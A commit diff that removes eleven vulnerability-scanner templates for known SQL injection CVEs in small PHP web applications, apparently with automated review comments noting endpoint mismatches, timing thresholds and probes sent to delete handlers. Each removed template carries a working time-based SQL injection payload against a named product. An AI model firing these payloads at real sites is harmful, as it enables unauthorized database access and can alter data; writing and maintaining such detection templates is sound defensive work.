Removed CVEs templates for miscellaneous / random / non-active projects

patch-4
sandeep 2024-06-22 22:23:27 -07:00
parent a4c09b8719
commit 28e34b09e7
11 changed files with 0 additions and 548 deletions

@ -1,49 +0,0 @@
id: CVE-2020-21012
info:
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0.
reference:
- https://github.com/hitIer/web_test/tree/master/hotel
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-21012
cwe-id: CWE-89
epss-score: 0.07351
epss-percentile: 0.94065
cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: hotel_and_lodge_booking_management_system_project
product: hotel_and_lodge_booking_management_system
tags: cve,cve2020,hotel,sqli,unauth,hotel_and_lodge_booking_management_system_project
http:
- raw:
- |
POST /forgot_password.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
btn_forgot=1&email=1%27%20or%20sleep(6)%23
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Hotel Booking System")'
condition: and
# digest: 490a0046304402206a88819f2a86877b474553fa4d72a8497496bda2b7febbd32b1d01a50895f70f0220064783fae9efeb7a0a87128c5598da4c150295bc3d5edc3c723dd92cf3bdf564:922c64590222798bb761d5b6d8e72950
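
Review bot: The description and the request disagree about where CVE-2020-21012 lives: the description names the email parameter on the edit pages for Customer, Room, Currency, Room Booking Details and Tax Details, while the only request posts email to /forgot_password.php. The file is marked "verified: true" and "severity: critical", so the commit message should say whether it is being dropped because the project is inactive or because the check never covered the documented endpoints; anyone who relied on it for this CVE needs to know which.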

@ -1,55 +0,0 @@
id: CVE-2020-29284
info:
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0.
reference:
- https://www.exploit-db.com/exploits/48984
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
- https://www.sourcecodester.com/php/14568/multi-restaurant-table-reservation-system-php-full-source-code.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29284
cwe-id: CWE-89
epss-score: 0.14147
epss-percentile: 0.95695
cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: multi_restaurant_table_reservation_system_project
product: multi_restaurant_table_reservation_system
tags: cve,cve2020,tablereservation,sqli,unauth,edb,multi_restaurant_table_reservation_system_project
http:
- method: GET
path:
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: word
part: body
words:
- "Restaurent Tables"
- "Chair List"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204a961e5e3dc591d1ed31952da38d3c4adda8a605b53182dd3cfaf34a4587adbd02204bc0a9fd3fd1d1cf9066837dfe68c9e2892868bd518817ec6fd744cfd35eaff1:922c64590222798bb761d5b6d8e72950

@ -1,61 +0,0 @@
id: CVE-2021-28419
info:
name: SEO Panel 4.8.0 - Blind SQL Injection
author: theamanrawat
severity: high
description: |
SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
remediation: |
Upgrade to a patched version of SEO Panel or apply the necessary security patches.
reference:
- https://github.com/seopanel/Seo-Panel/issues/209
- https://www.seopanel.org/spdownload/4.8.0
- https://nvd.nist.gov/vuln/detail/CVE-2021-28419
- http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-28419
cwe-id: CWE-89
epss-score: 0.15235
epss-percentile: 0.95839
cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: seopanel
product: seo_panel
tags: cve2021,cve,sqli,seopanel,auth,packetstorm
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: _csrf={{rand_base(54,"abc")}};
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}login.php
Cookie: _csrf={{rand_base(54,"abc")}};
sec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=
- |
GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1
Host: {{Hostname}}
Cookie: _csrf={{rand_base(54,"abc")}};
matchers:
- type: dsl
dsl:
- 'duration_3>=6'
- 'status_code_3 == 200'
- 'contains(body_3, "Overall Report Summary")'
condition: and
# digest: 4b0a00483046022100ebd0306427622fbd07c1768dfa8ecb58d13a80f7971106070053c48fa894595a022100cd93ac88aa8efefeabbeed69ff2de4875f337e81be596b93045772e4b1554ff7:922c64590222798bb761d5b6d8e72950
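
Review bot: SEO Panel does not obviously fit the commit message's "miscellaneous / random / non-active projects": the reference list points at an upstream issue tracker (github.com/seopanel/Seo-Panel/issues/209) and a vendor download page, unlike the Sourcecodester samples removed alongside it. Please state the reason for this file separately. If the template is kept or later restored, the third request injects SLEEP(3) while the matcher requires "duration_3>=6", so payload and threshold should be aligned, and "red_referer=http%3A%2F%2F{{BaseURL}}" prepends a scheme to a variable that already contains one.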

@ -1,49 +0,0 @@
id: CVE-2021-40908
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40908
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-40908
cwe-id: CWE-89
epss-score: 0.0161
epss-percentile: 0.87425
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: purchase_order_management_system_project
product: purchase_order_management_system
tags: cve2021,cve,sqli,purchase-order,poms,purchase_order_management_system_project
http:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"incorrect\"")'
condition: and
# digest: 4a0a0047304502201d9682cdcb8a39247b1f2923f30931761018c186957eca58eef1294ee24c2fa9022100dd83265eb60eb8119663c8d5805b5654203d946f4cf1ee4cb28f0414ac670ca6:922c64590222798bb761d5b6d8e72950

@ -1,51 +0,0 @@
id: CVE-2022-28022
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-28022
- https://github.com/ARPSyndicate/cvemon
- https://github.com/debug601/bug_report
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28022
cwe-id: CWE-89
epss-score: 0.02031
epss-percentile: 0.87755
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: purchase_order_management_system_project
product: purchase_order_management_system
tags: cve,cve2022,sqli,purchase-order-management-system,purchase_order_management_system_project
http:
- raw:
- |
POST /classes/Master.php?f=delete_item HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"success")'
condition: and
# digest: 490a0046304402207642be1d7f464fbdee2b2c77ec3ff7744acd40cd51c5d4b48b4d5a1b9eb298970220699beadc0427e71dde4e50f58c205c159cd96486d5cfb6ae26453b5c8a316cca:922c64590222798bb761d5b6d8e72950
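
Review bot: The request line "POST /classes/Master.php?f=delete_item" sends the timing probe to a delete handler, and the matcher only fires when the body contains "status":"success", that is, when the handler reports that it ran. A scan check that exercises a state-changing endpoint is a stronger reason to retire this file than project inactivity, and it is worth recording in the commit message. The same applies to the delete_supplier template (CVE-2022-28023) removed in this commit.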

@ -1,51 +0,0 @@
id: CVE-2022-28023
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-28023
- https://github.com/ARPSyndicate/cvemon
- https://github.com/debug601/bug_report
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28023
cwe-id: CWE-89
epss-score: 0.0161
epss-percentile: 0.87425
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: purchase_order_management_system_project
product: purchase_order_management_system
tags: cve,cve2022,sqli,purchase-order,poms,purchase_order_management_system_project
http:
- raw:
- |
POST /classes/Master.php?f=delete_supplier HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
id=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"success")'
condition: and
# digest: 4b0a00483046022100c1b076f7cdfb320f0d71c0f505593b36b406e9e696bb737f0a0d61388ad61e80022100c896c24e641121b1bff83ab1240ae92d23978d4f6a153271867759af201479fb:922c64590222798bb761d5b6d8e72950

@ -1,45 +0,0 @@
id: CVE-2022-31980
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-7.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31980
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31980
cwe-id: CWE-89
epss-score: 0.01429
epss-percentile: 0.85199
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Control Teams")'
condition: and
# digest: 4b0a00483046022100d3341f65cb26f4caef4623c562e9c774a42d72d1b51a42bb411f7ff44a7bf95d022100b2ee810fbeb3fca59b9907d6cdfe24246501706f3d77fa3b5e7526e32f8fc395:922c64590222798bb761d5b6d8e72950
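
Review bot: The classification carries PR:H and the path sits under /admin/, yet the template has "max-request: 1", no login request and no auth tag, so as written it could only match where the admin page answered without a session. The description also gives the path as /ofrs/admin/... while the request uses {{BaseURL}}/admin/.... The three sibling Online Fire Reporting System templates removed in this commit share both traits; saying so in the commit message would explain the removal better than "non-active projects" does.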

@ -1,45 +0,0 @@
id: CVE-2022-31981
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-6.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31981
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31981
cwe-id: CWE-89
epss-score: 0.01593
epss-percentile: 0.87356
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Control Teams")'
condition: and
# digest: 4a0a00473045022100d65b2d7292abe523b4dc1d6438eaab7a214662256779f7eb3c0bb76b8747d5e50220050bf41ca7a3b23c0054e85bf5aa2bf734b36b2a69ec82c38a61e68fc2d507d3:922c64590222798bb761d5b6d8e72950

@ -1,45 +0,0 @@
id: CVE-2022-31982
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31982
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31982
cwe-id: CWE-89
epss-score: 0.01426
epss-percentile: 0.8625
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Request Detail")'
condition: and
# digest: 490a00463044022010dde84fca947b7396161fd4683955e87f7f25ea2671996f04fd6011e69346220220781574af1cca7ad8a241f7d8ab76479836e61236b6b46d7a4f9136cea968d23b:922c64590222798bb761d5b6d8e72950

@ -1,47 +0,0 @@
id: CVE-2022-31983
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31983
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/trhacknon/Pocingit
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31983
cwe-id: CWE-89
epss-score: 0.13959
epss-percentile: 0.95665
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Request Detail")'
condition: and
# digest: 490a0046304402204af8863950057b32e9684b9023e7884d1a76824a27e8591e296376788d9565e302202866cbbcb967e8a82db30b5e44ca11175311f2f73222aa124aafe5a17f3f4069:922c64590222798bb761d5b6d8e72950

@ -1,50 +0,0 @@
id: CVE-2023-29622
info:
name: Purchase Order Management v1.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/SQLi
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-29622
- https://portswigger.net/web-security/sql-injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-29622
cwe-id: CWE-89
epss-score: 0.02992
epss-percentile: 0.90889
cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: purchase_order_management_project
product: purchase_order_management
tags: cve2023,cve,sqli,purchase-order,poms,purchase_order_management_project
http:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"incorrect")'
condition: and
# digest: 4a0a0047304502205279b241ecf32df15ffa523a7a164a86fb770d7bdac0be256ffd4930452d13f5022100d4cc576894eab1b14574b357ab4f365e85a04c865af32e12d28f03751d468c34:922c64590222798bb761d5b6d8e72950
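
Review bot: The cpe, vendor and product values here (purchase_order_management_project / purchase_order_management) differ from the other three Purchase Order Management templates in this commit, which use purchase_order_management_system_project / purchase_order_management_system. Anyone auditing this removal by vendor or product will miss one of the two groups, so the commit message should list the removed CVE ids. The description also places the flaw at /purchase_order/admin/login.php, but the request posts to /classes/Login.php?f=login, the same endpoint as the CVE-2021-40908 template.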